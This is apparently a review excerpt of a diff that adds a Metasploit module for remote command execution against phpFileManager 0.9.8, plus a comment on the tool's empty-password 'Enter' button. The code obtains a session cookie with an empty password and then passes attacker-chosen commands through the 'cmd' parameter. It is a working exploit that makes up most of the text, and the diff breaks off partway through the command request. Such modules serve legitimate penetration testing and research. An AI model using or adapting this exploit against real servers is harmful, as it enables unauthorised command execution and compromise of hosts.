modules/exploits/multi/http/phpfilemanager_rce.rb

```diff
@@ -0,0 +1,126 @@
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'phpFileManager 0.9.8 Remote Code Execution',
+      'Description'    => %q{
+         This module exploits a remote code execution vulnerability in phpFileManager
+         0.9.8 which is a filesystem management tool on a single file.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'hyp3rlinx', # initial discovery
+          'Jay Turla' # msf
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '37709' ],
+          [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 2000,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['phpFileManager / Unix', { 'Platform' => 'unix' } ],
+          ['phpFileManager / Windows', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => 'Aug 28 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']),
+      ],self.class)
+  end
+
+  def check
+    cookie = push()
+    txt = Rex::Text.rand_text_alpha(8)
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path.to_s),
+      'cookie'   => cookie,
+      'vars_get' => {
+        'action' => '6',
+        'cmd' => 'echo #{txt}'
+      }
+    })
+
+   if res and res.body =~ /txt/
+     return Exploit::CheckCode::Vulnerable
+   end
+   return Exploit::CheckCode::Safe
+  end
+
+  def push
+    uri =  normalize_uri(target_uri.path.to_s)
+
+    # To push the Enter button
+    res = send_request_cgi({
+      'method'	=>	'POST',
+      'uri' =>	uri,
+      'vars_post' => {
+        'frame' => '3',
+       'pass'  => '' # yep this should be empty
+       }
+    })
+
+    if res.nil?
+      vprint_error("#{peer} - Connection timed out")
+      return :abort
+    end
+
+    location = res.headers['Location']
+
+    if res && res.headers && res.code == 302 && location =~ /index.php/
+      print_good("#{peer} - Logged in to the file manager")
+      cookie = res.get_cookies
+      cookie
+    else
+      vprint_error("#{peer} - Error entering the file manager")
+      return
+    end
+  end
+
+  def http_send_command(cmd)
+    cookie = push()
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path.to_s),
+      'cookie'   => cookie,
+      'vars_get' => {
+      'action' => '6',
+        'cmd' => cmd
```

Comment:
But there is no authentication. It is just a button with a hidden field pass and action. The button just says "Enter" and then it gives you a cookie after submitting the button. If you don't do this you won't be able to access the file manager :) kinda weird actually lol